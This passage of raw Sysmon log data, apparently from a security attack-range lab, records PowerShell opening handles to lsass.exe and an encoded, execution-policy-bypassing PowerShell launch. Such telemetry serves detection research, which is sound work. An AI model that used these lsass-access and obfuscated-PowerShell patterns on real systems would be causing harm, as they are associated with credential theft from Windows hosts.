ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.423{59A5CD1D-8E56-6005-2E00-00000000A301}246412.1.0.10.in-addr.arpa.1460-C:\Windows\sysmon64.exe 13241300x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.985{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005da) 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.985{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.985{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3dnbasr4.bxl.ps12021-01-18 13:34:38.938 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.923{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7E00-00000000A301}42804284C:\Windows\system32\cmd.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.899{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 